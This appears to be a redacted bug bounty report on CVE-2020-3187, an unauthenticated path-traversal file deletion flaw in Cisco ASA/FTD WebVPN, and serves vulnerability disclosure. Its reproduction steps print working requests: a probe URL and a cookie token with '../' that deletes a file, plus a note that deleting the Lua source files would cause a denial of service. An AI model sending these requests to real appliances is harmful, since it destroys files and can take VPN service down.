Unauthenticated Arbitrary File Deletion "CVE-2020-3187" in █████

**Summary:** A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files. **Description:** Vulnerable host: `██████████` ## Impact An exploit could allow the attacker to view or delete arbitrary files on the system. ## Step-by-step Reproduction Instructions 1.Identifying vulnerable host by send request to /+CSCOE+/session_password.html. curl -skiL "███/+CSCOE+/session_password.html" ``` GET /+CSCOE+/session_password.html HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,ar;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: webvpnlogin=1; webvpnLang=en Upgrade-Insecure-Requests: 1 ``` If the target is vulnerable, the response header will display webvpn header, like: The request gave me the following response ``` HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 0 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Wed, 04 Nov 2020 21:40:44 GMT X-Frame-Options: SAMEORIGIN webvpn: ``` **2.Perform exploits to delete files by adding token in cookie header request.** For example, I wanted to delete this (██████/+CSCOU+/csco_logo.gif) file. That did not work because sometimes logo.gif/png has permission issues so try this "█████/+CSCOE+/blank.html" You can also delete the file "/+CSCOE+/blank.html" (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files Request: ```GET /+CSCOE+/blank.html HTTP/1.1 Host: ██████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,ar;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: webvpnlogin=1; webvpnLang=en Upgrade-Insecure-Requests: 1``` Response: ``` HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Wed, 04 Nov 2020 21:54:48 GMT X-Frame-Options: SAMEORIGIN Content-Length: 13 <HTML></HTML> ``` **3. So I exploited the CVE and deleted the blank file. As following:** Request: ``` GET /+CSCOE+/session_password.html HTTP/1.1 Host: █████████ Cookie: token=../+CSCOE+/blank.html User-Agent: curl/7.47.0 Accept: */* ``` Response: ``` HTTP/1.1 200 OK Content-Type: text/plain Content-Length: 0 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Wed, 04 Nov 2020 21:55:02 GMT X-Frame-Options: SAMEORIGIN webvpn: ``` File deleted successfully: `curl -Ik ████/+CSCOE+/blank.html` ``` HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Connection: Close Date: Wed, 04 Nov 2020 21:55:08 GMT X-Frame-Options: SAMEORIGIN File not found ``` Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted. ## Suggested Mitigation/Remediation Actions Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43 ## Impact *High - This vulnerability allows the attacker to delete files within the web services file system.*